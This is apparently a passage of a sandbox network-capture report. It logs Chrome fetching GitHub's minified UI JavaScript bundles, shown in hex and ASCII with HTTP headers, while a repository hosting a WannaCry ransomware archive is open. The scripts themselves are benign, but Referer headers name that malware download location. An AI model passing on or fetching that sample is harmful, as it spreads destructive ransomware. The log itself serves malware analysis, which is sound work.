                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 46 69 72 73 74 4f 70 74 69 6f 6e 26 26 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6c 69 73 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 5d 3a 6e 6f 74 28 5b 61 72 69 61 2d 64 69 73 61 62 6c 65 64 3d 22 74 72 75 65 22 5d 29 27 29 29 2e 66 69 6c 74 65 72 28 69 29 5b 30 5d 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 6f 6d 62 6f 62 6f 78 2d 6f 70 74 69 6f 6e 2d 64 65 66 61 75 6c 74 22 2c 22 74 72 75 65 22 29 29 7d 6e 61 76 69 67 61 74 65 28 74 3d 31 29 7b 6c 65 74 20 65 3d 41 72 72 61 79 2e 66 72 6f 6d 28 74 68 69 73 2e 6c 69 73 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 61 72 69
                                                                                      Data Ascii: FirstOption&&(null===(t=Array.from(this.list.querySelectorAll('[role="option"]:not([aria-disabled="true"])')).filter(i)[0])||void 0===t||t.setAttribute("data-combobox-option-default","true"))}navigate(t=1){let e=Array.from(this.list.querySelectorAll('[ari
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 5d 2c 20 5b 64 61 74 61 2d 63 6f 6d 62 6f 62 6f 78 2d 6f 70 74 69 6f 6e 2d 64 65 66 61 75 6c 74 3d 22 74 72 75 65 22 5d 27 29 3b 72 65 74 75 72 6e 21 21 69 26 26 28 22 74 72 75 65 22 3d 3d 3d 69 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 29 7c 7c 28 69 2e 63 6c 69 63 6b 28 29 2c 21 30 29 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 72 65 74 75 72 6e 21 74 2e 68 69 64 64 65 6e 26 26 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 26 26 22 68 69 64 64 65 6e 22 3d 3d 3d 74 2e 74 79 70 65 29 26 26 28 74 2e 6f 66 66 73 65 74 57 69 64 74 68 3e 30 7c 7c 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 3e 30 29 7d 6c 65 74 20 6e 3d 2f 5c 73 7c 5c 28 7c 5c 5b 2f 2c 73 3d 5b 22 70
                                                                                      Data Ascii: ], [data-combobox-option-default="true"]');return!!i&&("true"===i.getAttribute("aria-disabled")||(i.click(),!0))}function i(t){return!t.hidden&&!(t instanceof HTMLInputElement&&"hidden"===t.type)&&(t.offsetWidth>0||t.offsetHeight>0)}let n=/\s|\(|\[/,s=["p
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 69 6e 70 75 74 22 2c 74 68 69 73 2e 6f 6e 69 6e 70 75 74 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 74 68 69 73 2e 6f 6e 6b 65 79 64 6f 77 6e 29 2c 74 68 69 73 2e 69 6e 70 75 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 74 68 69 73 2e 6f 6e 62 6c 75 72 29 7d 64 69 73 6d 69 73 73 4d 65 6e 75 28 29 7b 74 68 69 73 2e 64 65 61 63 74 69 76 61 74 65 28 29 26 26 28 74 68 69 73 2e 6c 6f 6f 6b 42 61 63 6b 49 6e 64 65 78 3d 74 68 69 73 2e 69 6e 70 75 74 2e 73 65 6c 65 63 74 69 6f 6e 45 6e 64 7c 7c 74 68 69 73 2e 6c 6f 6f 6b 42 61 63 6b 49 6e 64 65
                                                                                      Data Ascii: his.input.removeEventListener("input",this.oninput),this.input.removeEventListener("keydown",this.onkeydown),this.input.removeEventListener("blur",this.onblur)}dismissMenu(){this.deactivate()&&(this.lookBackIndex=this.input.selectionEnd||this.lookBackInde
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 76 61 6c 75 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 65 29 3b 73 26 26 28 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 73 29 29 2c 28 73 3d 74 2e 76 61 6c 75 65 2e 73 75 62 73 74 72 69 6e 67 28 65 29 29 26 26 28 6e 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 73 29 29 7d 65 6c 73 65 7b 6c 65 74 20 65 3d 74 2e 76 61 6c 75 65 3b 65 26 26 28 69 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 65 29 29 7d 69 66 28 69 26 26 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 69 29 2c 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 75 29 2c 6e 26 26 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 21 6c 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 69 66 28 21 74 2e 70 61 72 65 6e 74
                                                                                      Data Ascii: value.substring(0,e);s&&(i=document.createTextNode(s)),(s=t.value.substring(e))&&(n=document.createTextNode(s))}else{let e=t.value;e&&(i=document.createTextNode(e))}if(i&&l.appendChild(i),l.appendChild(u),n&&l.appendChild(n),!l.parentElement){if(!t.parent
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 65 73 74 72 6f 79 28 29 2c 74 68 69 73 2e 63 6f 6d 62 6f 62 6f 78 3d 6e 75 6c 6c 2c 74 2e 72 65 6d 6f 76 65 28 29 2c 21 30 29 7d 6f 6e 43 6f 6d 6d 69 74 28 7b 74 61 72 67 65 74 3a 74 7d 29 7b 76 61 72 20 65 3b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 7c 7c 21 74 68 69 73 2e 63 6f 6d 62 6f 62 6f 78 29 72 65 74 75 72 6e 3b 6c 65 74 20 69 3d 74 68 69 73 2e 6d 61 74 63 68 3b 69 66 28 21 69 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 74 68 69 73 2e 69 6e 70 75 74 2e 76 61 6c 75 65 2e 73 75 62 73 74 72 69 6e 67 28 30 2c 69 2e 70 6f 73 69 74 69 6f 6e 2d 69 2e 6b 65 79 2e 6c 65 6e 67 74 68 29 2c 73 3d 74 68 69 73 2e 69 6e 70 75 74 2e 76 61 6c 75 65 2e 73 75 62 73 74 72 69 6e 67 28 69 2e 70 6f 73 69 74 69 6f 6e 2b 69
                                                                                      Data Ascii: estroy(),this.combobox=null,t.remove(),!0)}onCommit({target:t}){var e;if(!(t instanceof HTMLElement)||!this.combobox)return;let i=this.match;if(!i)return;let n=this.input.value.substring(0,i.position-i.key.length),s=this.input.value.substring(i.position+i
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 65 72 2e 6b 65 79 73 29 29 7b 6c 65 74 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 69 2c 7b 6d 75 6c 74 69 57 6f 72 64 3a 73 2c 6c 6f 6f 6b 42 61 63 6b 49 6e 64 65 78 3a 6f 2c 6c 61 73 74 4d 61 74 63 68 50 6f 73 69 74 69 6f 6e 3a 72 7d 3d 7b 6d 75 6c 74 69 57 6f 72 64 3a 21 31 2c 6c 6f 6f 6b 42 61 63 6b 49 6e 64 65 78 3a 30 2c 6c 61 73 74 4d 61 74 63 68 50 6f 73 69 74 69 6f 6e 3a 6e 75 6c 6c 7d 29 7b 6c 65 74 20 61 3d 74 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 65 2c 69 2d 31 29 3b 69 66 28 2d 31 3d 3d 3d 61 7c 7c 61 3c 6f 29 72 65 74 75 72 6e 3b 69 66 28 73 29 7b 69 66 28 6e 75 6c 6c 21 3d 72 29 7b 69 66 28 72 3d 3d 3d 61 29 72 65 74 75 72 6e 3b 61 3d 72 2d 65 2e 6c 65 6e 67 74 68 7d 6c 65 74 20 6e 3d 74 5b 61 2b 31 5d 3b 69 66 28 22 20 22 3d 3d 3d 6e
                                                                                      Data Ascii: er.keys)){let o=function(t,e,i,{multiWord:s,lookBackIndex:o,lastMatchPosition:r}={multiWord:!1,lookBackIndex:0,lastMatchPosition:null}){let a=t.lastIndexOf(e,i-1);if(-1===a||a<o)return;if(s){if(null!=r){if(r===a)return;a=r-e.length}let n=t[a+1];if(" "===n
                                                                                      2024-03-23 14:47:22 UTC672INData Raw: 69 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 6d 75 6c 74 69 77 6f 72 64 22 29 3b 72 65 74 75 72 6e 20 65 2e 6d 61 70 28 74 3d 3e 28 7b 6b 65 79 3a 74 2c 6d 75 6c 74 69 57 6f 72 64 3a 73 7c 7c 6e 2e 69 6e 63 6c 75 64 65 73 28 74 29 7d 29 29 7d 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 2c 20 74 65 78 74 61 72 65 61 27 29 3b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70 75 74 45 6c 65 6d 65 6e 74 7c 7c 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 54 65 78 74 41 72 65 61 45 6c 65 6d 65 6e 74 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 65 3d 6e 65 77 20 54 65 78 74 45 78 70 61
                                                                                      Data Ascii: is.hasAttribute("multiword");return e.map(t=>({key:t,multiWord:s||n.includes(t)}))}connectedCallback(){let t=this.querySelector('input[type="text"], textarea');if(!(t instanceof HTMLInputElement||t instanceof HTMLTextAreaElement))return;let e=new TextExpa


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      22192.168.2.1649726185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC736OUTGET /assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-654130b7cde5.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 18560
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 28 Feb 2024 14:37:49 GMT
                                                                                      ETag: 0x8DC386AD642C84F
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 1411927
                                                                                      X-Served-By: cache-iad-kcgs7200169-IAD, cache-lga21979-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2617, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: ae113d45906585646e90a1dccd110633366128d0
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6d 6f 74 65 2d 69 6e 70 2d 62 37 64 38 66 34 22 5d 2c 7b 31 33 30 30 32 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 61 7d 29 3b 6c 65 74 20 46 69 6c 74 65 72 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3d 63 6c 61 73 73 20 46 69 6c 74 65 72 49 6e 70 75 74 45 6c 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4"],{13002:(t,e,n)=>{n.d(e,{Z:()=>a});let FilterInputElement=class FilterInputEle
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6f 77 6e 73 22 29 3b 69 66 28 21 61 29 72 65 74 75 72 6e 3b 6c 65 74 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 21 73 29 72 65 74 75 72 6e 3b 6c 65 74 20 6f 3d 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 69 6c 74 65 72 2d 6c 69 73 74 22 29 3f 73 3a 73 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 66 69 6c 74 65 72 2d 6c 69 73 74 5d 22 29 3b 69 66 28 21 6f 7c 7c 28 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 66 69 6c 74 65 72 2d 69 6e 70 75 74 2d 73 74 61 72 74 22 2c 7b 62 75 62 62 6c 65 73 3a 21 30 7d 29 29 2c 65 26 26 74 2e 63 75 72 72 65
                                                                                      Data Ascii: =t.getAttribute("aria-owns");if(!a)return;let s=document.getElementById(a);if(!s)return;let o=s.hasAttribute("data-filter-list")?s:s.querySelector("[data-filter-list]");if(!o||(t.dispatchEvent(new CustomEvent("filter-input-start",{bubbles:!0})),e&&t.curre
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 74 73 2e 64 65 66 69 6e 65 28 22 66 69 6c 74 65 72 2d 69 6e 70 75 74 22 2c 46 69 6c 74 65 72 49 6e 70 75 74 45 6c 65 6d 65 6e 74 29 29 7d 2c 38 38 33 30 39 3a 28 74 2c 65 2c 6e 29 3d 3e 7b 6e 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 73 7d 29 3b 6c 65 74 20 72 3d 6e 65 77 20 57 65 61 6b 4d 61 70 3b 6c 65 74 20 52 65 6d 6f 74 65 49 6e 70 75 74 45 6c 65 6d 65 6e 74 3d 63 6c 61 73 73 20 52 65 6d 6f 74 65 49 6e 70 75 74 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 29 3b 6c 65 74 20 74 3d 69 2e 62 69 6e 64 28 6e 75 6c 6c 2c 74 68 69 73 2c 21 30 29 2c 65 3d 7b 63 75 72 72 65 6e 74 51 75 65 72 79 3a 6e 75 6c 6c 2c 6f 6e 69 6e 70 75 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29
                                                                                      Data Ascii: ts.define("filter-input",FilterInputElement))},88309:(t,e,n)=>{n.d(e,{Z:()=>s});let r=new WeakMap;let RemoteInputElement=class RemoteInputElement extends HTMLElement{constructor(){super();let t=i.bind(null,this,!0),e={currentQuery:null,oninput:function(t)
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 69 61 2d 6f 77 6e 73 22 29 7c 7c 22 22 29 3b 69 66 28 21 63 29 72 65 74 75 72 6e 3b 6c 65 74 20 75 3d 6e 65 77 20 55 52 4c 28 6c 2c 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 64 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 28 75 2e 73 65 61 72 63 68 29 3b 64 2e 61 70 70 65 6e 64 28 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 70 61 72 61 6d 22 29 7c 7c 22 71 22 2c 6f 29 2c 75 2e 73 65 61 72 63 68 3d 64 2e 74 6f 53 74 72 69 6e 67 28 29 2c 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 3f 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 61 62 6f 72 74 28 29 3a 28 74 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 6e 65 77 20 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 6c 6f 61 64 73 74 61 72 74 22 29 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74
                                                                                      Data Ascii: ia-owns")||"");if(!c)return;let u=new URL(l,window.location.href),d=new URLSearchParams(u.search);d.append(t.getAttribute("param")||"q",o),u.search=d.toString(),s.controller?s.controller.abort():(t.dispatchEvent(new CustomEvent("loadstart")),t.setAttribut
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 65 2e 63 6c 6f 73 65 73 74 28 74 2e 74 61 67 4e 61 6d 65 29 3d 3d 3d 74 29 7d 6e 2e 64 28 65 2c 7b 5a 3a 28 29 3d 3e 54 61 62 43 6f 6e 74 61 69 6e 65 72 45 6c 65 6d 65 6e 74 7d 29 3b 6c 65 74 20 54 61 62 43 6f 6e 74 61 69 6e 65 72 45 6c 65 6d 65 6e 74 3d 63 6c 61 73 73 20 54 61 62 43 6f 6e 74 61 69 6e 65 72 45 6c 65 6d 65 6e 74 20 65 78 74 65 6e 64 73 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 29 2c 74 68 69 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 74 3d 3e 7b 6c 65 74 20 65 3d 74 2e 74 61 72 67 65 74 3b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 7c 7c 65 2e 63 6c 6f
                                                                                      Data Ascii: HTMLElement&&e.closest(t.tagName)===t)}n.d(e,{Z:()=>TabContainerElement});let TabContainerElement=class TabContainerElement extends HTMLElement{constructor(){super(),this.addEventListener("keydown",t=>{let e=t.target;if(!(e instanceof HTMLElement)||e.clo
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 62 75 62 62 6c 65 73 3a 21 30 2c 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 2c 64 65 74 61 69 6c 3a 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 73 7d 7d 29 29 3b 69 66 28 21 6f 29 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 6e 29 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 73 65 6c 65 63 74 65 64 22 2c 22 66 61 6c 73 65 22 29 2c 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 2c 22 2d 31 22 29 3b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 69 29 74 2e 68 69 64 64 65 6e 3d 21 30 2c 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 7c 7c 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 74 61 62 2d 63 6f 6e 74 61 69 6e 65 72 2d 6e 6f 2d 74 61 62 73 74 6f 70 22 29 7c 7c 74 2e 73 65
                                                                                      Data Ascii: bubbles:!0,cancelable:!0,detail:{relatedTarget:s}}));if(!o){for(let t of n)t.setAttribute("aria-selected","false"),t.setAttribute("tabindex","-1");for(let t of i)t.hidden=!0,t.hasAttribute("tabindex")||t.hasAttribute("data-tab-container-no-tabstop")||t.se
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 6c 6c 3d 3d 74 7c 7c 74 2e 66 6f 63 75 73 28 29 7d 2c 65 2e 70 72 65 70 65 6e 64 28 75 29 2c 65 2e 61 70 70 65 6e 64 28 64 29 3b 6c 65 74 20 66 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6c 65 74 20 65 3d 6e 65 77 20 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 3b 72 65 74 75 72 6e 20 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 61 62 6f 72 74 22 2c 28 29 3d 3e 7b 65 2e 61 62 6f 72 74 28 29 7d 29 2c 65 7d 28 63 29 3b 69 66 28 72 29 7b 6c 65 74 20 74 3d 72 3b 72 2e 63 6f 6e 74 61 69 6e 65 72 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 66 6f 63 75 73 2d 74 72 61 70 22 2c 22 73 75 73 70 65 6e 64 65 64 22 29 2c 72 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 61 62 6f 72 74 28 29 2c 61 2e 70 75 73 68 28 74 29 7d 66 2e 73 69 67 6e 61 6c 2e 61
                                                                                      Data Ascii: ll==t||t.focus()},e.prepend(u),e.append(d);let f=function(t){let e=new AbortController;return t.addEventListener("abort",()=>{e.abort()}),e}(c);if(r){let t=r;r.container.setAttribute("data-focus-trap","suspended"),r.controller.abort(),a.push(t)}f.signal.a
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 64 20 77 69 74 68 6f 75 74 20 61 20 73 65 74 74 65 72 22 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 74 21 3d 3d 65 7c 7c 21 69 3a 21 65 2e 68 61 73 28 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 77 72 69 74 65 20 70 72 69 76 61 74 65 20 6d 65 6d 62 65 72 20 74 6f 20 61 6e 20 6f 62 6a 65 63 74 20 77 68 6f 73 65 20 63 6c 61 73 73 20 64 69 64 20 6e 6f 74 20 64 65 63 6c 61 72 65 20 69 74 22 29 3b 72 65 74 75 72 6e 22 61 22 3d 3d 3d 72 3f 69 2e 63 61 6c 6c 28 74 2c 6e 29 3a 69 3f 69 2e 76 61 6c 75 65 3d 6e 3a 65 2e 73 65 74 28 74 2c 6e 29 2c 6e 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 29 7b 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 21 3d 3d 74 26 26 74 3f 2e 66 6f
                                                                                      Data Ascii: d without a setter");if("function"==typeof e?t!==e||!i:!e.has(t))throw TypeError("Cannot write private member to an object whose class did not declare it");return"a"===r?i.call(t,n):i?i.value=n:e.set(t,n),n};function d(t){document.activeElement!==t&&t?.fo
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 6f 70 65 6e 22 29 7d 73 65 74 20 6f 70 65 6e 28 74 29 7b 69 66 28 74 29 74 68 69 73 2e 6f 70 65 6e 7c 7c 28 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6f 70 65 6e 22 2c 22 22 29 2c 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 64 69 73 61 62 6c 65 64 22 2c 22 66 61 6c 73 65 22 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 70 61 64 64 69 6e 67 52 69 67 68 74 3d 60 24 7b 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 2d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 57 69 64 74 68 7d 70 78 60 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 3d 22 68 69 64 64
                                                                                      Data Ascii: (){return this.hasAttribute("open")}set open(t){if(t)this.open||(this.setAttribute("open",""),this.setAttribute("aria-disabled","false"),document.body.style.paddingRight=`${window.innerWidth-document.body.clientWidth}px`,document.body.style.overflow="hidd
                                                                                      2024-03-23 14:47:22 UTC1378INData Raw: 72 6e 20 74 68 69 73 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3f 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 6f 64 61 6c 2d 64 69 61 6c 6f 67 2d 6f 76 65 72 6c 61 79 22 29 3f 74 68 69 73 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3a 6e 75 6c 6c 7d 2c 73 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 4b 65 79 62 6f 61 72 64 45 76 65 6e 74 26 26 21 74 2e 69 73 43 6f 6d 70 6f 73 69 6e 67 26 26 74 68 69 73 2e 6f 70 65 6e 29 73 77 69 74 63 68 28 74 2e 6b 65 79 29 7b 63 61 73 65 22 45 73 63 61 70 65 22 3a 74 68 69 73 2e 63 6c 6f 73 65 28 29 2c 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 74 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 45 6e 74 65
                                                                                      Data Ascii: rn this.parentElement?.hasAttribute("data-modal-dialog-overlay")?this.parentElement:null},s=function(t){if(t instanceof KeyboardEvent&&!t.isComposing&&this.open)switch(t.key){case"Escape":this.close(),t.preventDefault(),t.stopPropagation();break;case"Ente


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      23192.168.2.1649727185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC736OUTGET /assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-3959a9-68b3d6c8feb2.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:22 UTC686INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 93964
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 19 Mar 2024 20:13:25 GMT
                                                                                      ETag: 0x8DC485108704912
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:22 GMT
                                                                                      Age: 159492
                                                                                      X-Served-By: cache-iad-kjyo7100085-IAD, cache-lga21936-LGA
                                                                                      X-Cache: HIT, HIT
